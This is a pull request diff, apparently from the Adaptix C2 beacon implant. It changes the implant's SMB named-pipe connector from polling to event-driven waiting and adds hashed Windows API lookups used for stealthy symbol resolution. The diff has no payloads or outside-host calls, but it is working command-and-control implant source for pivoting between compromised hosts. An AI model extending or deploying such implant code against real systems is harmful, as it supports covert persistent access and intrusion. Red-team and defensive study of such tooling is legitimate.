### PR TITLE
Restructure SMB Connector from Polling to Event-Driven Blocking

### DIFF
--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ApiDefines.h
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ApiDefines.h
@@ -93,9 +93,11 @@
 #define HASH_FUNC_VIRTUALALLOC                       0x63ce6376
 #define HASH_FUNC_VIRTUALFREE                        0xbd37a32d
 #define HASH_FUNC_WAITFORSINGLEOBJECT                0x471fd0f9
+#define HASH_FUNC_WAITFORMULTIPLEOBJECTS             0xa8544ad6
 #define HASH_FUNC_WAITNAMEDPIPEA                     0x8a2ba58d
 #define HASH_FUNC_WIDECHARTOMULTIBYTE                0x12d4f52d
 #define HASH_FUNC_WRITEFILE                          0xd4a33cef
+
 
 // iphlpapi
 #define HASH_FUNC_GETADAPTERSINFO                    0xa1376764

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.cpp
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.cpp
@@ -41,6 +41,14 @@ ConnectorSMB::ConnectorSMB()
 	this->functions->FreeSid                      = (decltype(FreeSid)*)                      GetSymbolAddress(SysModules->Advapi32, HASH_FUNC_FREESID);
 	this->functions->SetEntriesInAclA             = (decltype(SetEntriesInAclA)*)             GetSymbolAddress(SysModules->Advapi32, HASH_FUNC_SETENTRIESINACLA);
 	this->functions->SetSecurityDescriptorDacl    = (decltype(SetSecurityDescriptorDacl)*)    GetSymbolAddress(SysModules->Advapi32, HASH_FUNC_SETSECURITYDESCRIPTORDACL);
+
+    this->functions->CreateEventA = ApiWin->CreateEventA;
+    this->functions->SetEvent     = ApiWin->SetEvent;
+    this->functions->ResetEvent   = ApiWin->ResetEvent;
+    this->functions->WaitForMultipleObjects = (decltype(WaitForMultipleObjects)*)    GetSymbolAddress(SysModules->Kernel32, HASH_FUNC_WAITFORMULTIPLEOBJECTS);
+    
+    this->hTermEvent = this->functions->CreateEventA(NULL, TRUE, FALSE, NULL);
+
 }
 
 BOOL ConnectorSMB::SetProfile(void* profilePtr, BYTE* beatData, ULONG beatDataSize)
@@ -92,57 +100,66 @@ void ConnectorSMB::SendData(BYTE* data, ULONG data_size)
 {
     this->recvSize = 0;
 
-    if (data && data_size) {
-        DWORD NumberOfBytesWritten = 0;
-        if ( this->functions->WriteFile(this->hChannel, (LPVOID)&data_size, 4, &NumberOfBytesWritten, NULL) ) {
-            
-            DWORD index = 0;
-            DWORD size  = 0;
-            NumberOfBytesWritten = 0;
-            while (1) {
-                size = data_size - index;
-                if (data_size - index > 0x2000)
-                    size = 0x2000;
+    if (!data || !data_size)
+        return;
 
-                if ( !this->functions->WriteFile(this->hChannel, data + index, size, &NumberOfBytesWritten, 0) )
-                    break;
+    // Write outgoing data in chunks
+    DWORD NumberOfBytesWritten = 0;
+    if ( this->functions->WriteFile(this->hChannel, (LPVOID)&data_size, 4, &NumberOfBytesWritten, NULL) ) {
+        
+        DWORD index = 0;
+        DWORD size  = 0;
+        NumberOfBytesWritten = 0;
+        while (1) {
+            size = data_size - index;
+            if (data_size - index > 0x2000)
+                size = 0x2000;
 
-                index += NumberOfBytesWritten;
-                if (index >= data_size)
-                    break;
-            }
+            if ( !this->functions->WriteFile(this->hChannel, data + index, size, &NumberOfBytesWritten, 0) )
+                break;
+
+            index += NumberOfBytesWritten;
+            if (index >= data_size)
+                break;
         }
-        this->functions->FlushFileBuffers(this->hChannel);
     }
+
+    this->functions->FlushFileBuffers(this->hChannel);
+
 
     DWORD totalBytesAvail = 0;
     BOOL result = this->functions->PeekNamedPipe(this->hChannel, 0, 0, 0, &totalBytesAvail, 0);
     if (result && totalBytesAvail >= 4) {
+        this->ReadIncoming();
+    }
+}
 
-        DWORD NumberOfBytesRead = 0;
-        DWORD dataLength = 0;
-        if ( this->functions->ReadFile(this->hChannel, &dataLength, 4, &NumberOfBytesRead, 0) ) {
-            
-            if (dataLength > this->allocaSize) {
-                this->recvData = (BYTE*) this->functions->LocalReAlloc(this->recvData, dataLength, 0);
-                this->allocaSize = dataLength;
-            }
+void ConnectorSMB::ReadIncoming()
+{
 
-            NumberOfBytesRead = 0;
-            int index = 0;
-            while( this->functions->ReadFile(this->hChannel, this->recvData + index, dataLength - index, &NumberOfBytesRead, 0) && NumberOfBytesRead) {
-                index += NumberOfBytesRead;
+    DWORD NumberOfBytesRead = 0;
+    DWORD dataLength = 0;
+    if ( this->functions->ReadFile(this->hChannel, &dataLength, 4, &NumberOfBytesRead, 0) ) {
         
-                if (index > dataLength) {
-                    this->recvSize = -1;
-                    return;
-                }
-
-                if (index == dataLength)
-                    break;
-            }
-            this->recvSize = index;
+        if (dataLength > this->allocaSize) {
+            this->recvData = (BYTE*) this->functions->LocalReAlloc(this->recvData, dataLength, 0);
+            this->allocaSize = dataLength;
         }
+
+        NumberOfBytesRead = 0;
+        int index = 0;
+        while( this->functions->ReadFile(this->hChannel, this->recvData + index, dataLength - index, &NumberOfBytesRead, NULL) && NumberOfBytesRead) {
+            index += NumberOfBytesRead;
+    
+            if (index > dataLength) {
+                this->recvSize = -1;
+                return;
+            }
+
+            if (index == dataLength)
+                break;
+        }
+        this->recvSize = index;
     }
 }
 
@@ -196,7 +213,19 @@ void ConnectorSMB::Exchange(BYTE* plainData, ULONG plainSize, BYTE* sessionKey)
         EncryptRC4(plainData, plainSize, sessionKey, 16);
         this->SendData(plainData, plainSize);
     } else {
-        this->SendData(NULL, 0);
+        this->recvSize = 0;
+
+        if (this->dataReady) {
+            this->dataReady = FALSE;
+            this->ReadIncoming();
+        } else {
+
+            DWORD totalBytesAvail = 0;
+            BOOL result = this->functions->PeekNamedPipe(this->hChannel, 0, 0, 0, &totalBytesAvail, 0);
+            if (result && totalBytesAvail >= 4) {
+                this->ReadIncoming();
+            }
+        }
     }
 
     if (this->recvSize == 0 && TEB->LastErrorValue == ERROR_BROKEN_PIPE) {
@@ -236,5 +265,42 @@ void ConnectorSMB::CloseConnector()
         this->beat = nullptr;
         this->beatSize = 0;
     }
+    if (this->hTermEvent) {
+        
+        this->functions->SetEvent(this->hTermEvent);
+
+        this->functions->NtClose(this->hTermEvent);
+        this->hTermEvent = nullptr;
+    }
     this->functions->NtClose(this->hChannel);
+}
+
+void ConnectorSMB::Sleep(HANDLE wakeupEvent, ULONG workingSleep, ULONG sleepDelay, ULONG jitter, BOOL hasOutput)
+{
+    if (hasOutput)
+        return;
+
+    if (!this->connected || !this->hChannel)
+        return;
+
+    HANDLE waitHandles[3];
+    DWORD  handleCount = 0;
+
+    waitHandles[handleCount++] = this->hChannel;
+    waitHandles[handleCount++] = this->hTermEvent;
+    if (wakeupEvent)
+        waitHandles[handleCount++] = wakeupEvent;
+
+    DWORD result = this->functions->WaitForMultipleObjects(handleCount, waitHandles, FALSE, INFINITE);
+
+    if (result == WAIT_OBJECT_0) {
+        this->dataReady = TRUE;
+    }
+    else if (result == WAIT_OBJECT_0 + 1) {
+        this->connected = FALSE;
+    }
+    else if (result == WAIT_OBJECT_0 + 2 && wakeupEvent) {
+        this->functions->ResetEvent(wakeupEvent);
+    }
+
 }

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.h
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.h
@@ -53,6 +53,10 @@ struct SMBFUNC {
 	DECL_API(CreateNamedPipeA);
 	DECL_API(FlushFileBuffers);
 	DECL_API(PeekNamedPipe);
+	DECL_API(CreateEventA);
+	DECL_API(SetEvent);
+	DECL_API(ResetEvent);
+	DECL_API(WaitForMultipleObjects);
 
 	//advapi32
 	DECL_API(AllocateAndInitializeSid);
@@ -78,6 +82,9 @@ class ConnectorSMB : public Connector
 	ULONG beatSize = 0;
 	BOOL  connected = FALSE;
 
+	HANDLE hTermEvent = nullptr;
+	BOOL   dataReady  = FALSE;
+
 public:
 	ConnectorSMB();
 
@@ -92,13 +99,14 @@ public:
 	int   RecvSize() override;
 	void  RecvClear() override;
 
-	void Sleep(HANDLE wakeupEvent, ULONG workingSleep, ULONG sleepDelay, ULONG jitter, BOOL hasOutput) override {}
+	void Sleep(HANDLE wakeupEvent, ULONG workingSleep, ULONG sleepDelay, ULONG jitter, BOOL hasOutput) override;
 
 	static void* operator new(size_t sz);
 	static void operator delete(void* p) noexcept;
 
 private:
 	void SendData(BYTE* data, ULONG data_size);
+	void ReadIncoming();
 	void Listen();
 	void DisconnectInternal();
 };

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/MainAgent.cpp
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/MainAgent.cpp
@@ -81,7 +81,14 @@ DWORD WINAPI AgentMain(LPVOID lpParam)
 			g_AsyncBofManager->ProcessAsyncBofs(packerOut);
 
 			if (g_Agent->IsActive()) {
-				const BOOL hasOutput = (packerOut->datasize() >= 8);
+				BOOL hasOutput = (packerOut->datasize() >= 8);
+				if (!hasOutput) {
+					hasOutput = (g_Agent->pivotter->pivots.size() > 0)
+					         || (g_Agent->proxyfire->tunnels.size() > 0)
+					         || (g_Agent->jober->jobs.size() > 0)
+					         || (g_Agent->downloader->downloads.size() > 0);
+				}
+
 				g_Connector->Sleep(g_AsyncBofManager->GetWakeupEvent(), g_Agent->GetWorkingSleep(), g_Agent->config->sleep_delay, g_Agent->config->jitter_delay, hasOutput);
 			}
 

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/files/hashes.py
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/files/hashes.py
@@ -62,11 +62,13 @@ CreateFileA
 CreateNamedPipeA
 CreatePipe
 CreateProcessA
+CreateProcessWithTokenW
 CreateThread
 DeleteCriticalSection
 DeleteFileA
 DisconnectNamedPipe
 EnterCriticalSection
+TryEnterCriticalSection
 FindClose
 FindFirstFileA
 FindNextFileA
@@ -113,14 +115,19 @@ RemoveDirectoryA
 RtlCaptureContext
 SetCurrentDirectoryA
 SetEvent
+ResetEvent
 SetNamedPipeHandleState
 Sleep
 VirtualAlloc
 VirtualFree
 WaitForSingleObject
+WaitForMultipleObjects
 WaitNamedPipeA
 WideCharToMultiByte
 WriteFile
+WaitForSingleObjectEx
+GetOverlappedResult
+
 
 // iphlpapi
 GetAdaptersInfo
@@ -179,10 +186,12 @@ FreeLibrary
 __C_specific_handler
 AxAddScreenshot
 AxDownloadMemory
+
 // Async BOF
 BeaconRegisterThreadCallback
 BeaconUnregisterThreadCallback
 BeaconWakeup
+BeaconGetStopJobEvent
 
 // wininet
 InternetOpenA


### PR DESCRIPTION
Replaces the CPU-intensive PeekNamedPipe polling loop in the SMB connector with an event-driven blocking model using WaitForMultipleObjects. The beacon now sleeps efficiently until the parent beacon writes data, instead of continuously spinning and checking the pipe.
Added dataReady flag - Set when WaitForMultipleObjects detects pipe data. Exchange() reads directly via ReadIncoming() without a redundant peek, eliminating one extra syscall per receive cycle.
PeekNamedPipe retained only for the active-subsystem path - When tunnels, pivots, jobs, or downloads are running, Sleep() returns immediately and Exchange() does a single non-blocking PeekNamedPipe to check for data. This preserves fast turnaround for SOCKS proxying, port forwarding, and linked beacon traffic without the tight polling loop.
